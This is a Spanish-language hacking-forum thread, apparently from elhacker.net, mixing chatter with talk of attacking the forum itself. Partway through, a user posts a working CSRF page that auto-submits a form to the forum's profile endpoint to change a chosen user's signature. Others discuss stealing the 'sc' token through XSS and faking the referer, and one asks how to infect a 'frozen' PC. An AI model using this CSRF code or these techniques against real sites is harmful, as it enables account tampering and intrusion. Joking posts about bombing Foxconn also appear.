Mensajes

O sea que si le tiramos una bomba a foxcon nos quedamos sin xbox, play station, iphone, notebooks, kindles, vaios, etc?

Vaya!, si tuviera dinero me abriría una empresa que fabrique consolas y celulares y le enviaría una bomba a foxcon y competencia ganada!

Muy sutil tu plan 

Respecto a las i's sorry pero soy catalan y cuando escribo rapido se me escapan.

Espero no causar mucho dolor de ojos a nadie xD.

Solo postee porque como dijiste lo primero, pense que tenias una segunda cosa que decir ajjaajja nada más.

I con respecto a la comunidad, si es una gran comunidad y puede ser mejor si aportas tu granito de arena. No conozco una playa tan larga como elhacker.net en todo el litoral marítimo de habla hispana.

Saludos y suerte.

Hola a todos, soy nuevo en este foro, quiero infectar a un Pc que esta congelado y mi pregunta es: ¿Se puede infectar sin  que tenga que descongelar el PC o hay que descongelarlo? Respondanme rapido pls

Respuesta corta: Si.

Respuesta larga: Si, pero...

Hola, soy nuevo por acá, y bueno, primero de todo quisiera felicitarles a todos  por la fantástica página, o más bien comunidad que han credo. Me parece un lugar muy completo en el que encuentras cosas que ni te imaginabas que existieran, o simplemente ni si quiera habías oído hablar, en el que cada vez que entro aprendo algo nuevo.

I lo segundo?

Pero con xss lo puedes enviar desde la misma elhacker.net y no daria error de referencia no?

Bueno mi idea era solo obtener el sc con el xss para usarlo en el form, pero si necesita referer puedes hacer un script en la url que es vulnerable para insertar el form desde alli no?

I si no, no lo he probado nunca, pero no puedes hacer una petición falsa con el referer falsificado? Repito que no lo he probado ni se si puede hacerse.

Search on google.

xD

Jejej xD.
Lee de nuevo mi comentario, lo edite... Lo consigo de otra forma.

Aunque ya encontré un CSRF, que seria para cerrar sesion jajaja xD

Yo el formulario que he hecho es este:

Código [Seleccionar] Expandir


<html>
<head>
<title>Hacking elhacker.net</title>
</head>

<body>

<form action="http://foro.elhacker.net/profile2.html" method="post" accept-charset="ISO-8859-1" name="creator" id="creator" enctype="multipart/form-data">

<input type="hidden" name="signature" value="añlskdfñqwiejfñalksjndvpiqouwenfhñqwjkef">

<input type="hidden" name="sa" value="forumProfile">

<input type="hidden" name="sc" value="tu cookie"/>

<input type="hidden" name="userID" value="334657"/>

<script type="text/javascript">document.creator.submit();</script>

</form>

</body>

</html>


Si le pongo mi sc y el id del user la firma cambia.

Lo ejecuto desde el pc mismo desconozco si colgado en algun hosting funcionara pero diria mucho que si ya que si funciona abriendolo local.

Seguramente me paso algo por alto ~ Yoya ~ pero en las pruebas que realice funcionaba.

Ya he podido capturar el ID del token (sc).. Ahora hay otro filtro, que es el sitio de referencia xD, ya que el exploit que enviá el formulario se ejecuta en un sitio remoto xD.

Saludos.

Yo con el formulario que cree con mi sc podia cambiar mi firma. Ese otro filtro no lo he encontrado. Lo consigues con xss o de otra forma el sc?

Can you put it on pastebin?

Has contado con el token de seguridad "SC"?

El xss es para conseguirlo no?

Porque la url para cambiar el perfil es facil crearla en otro server pero necesitas el sc como dices.

Almenos lo que yo he probado.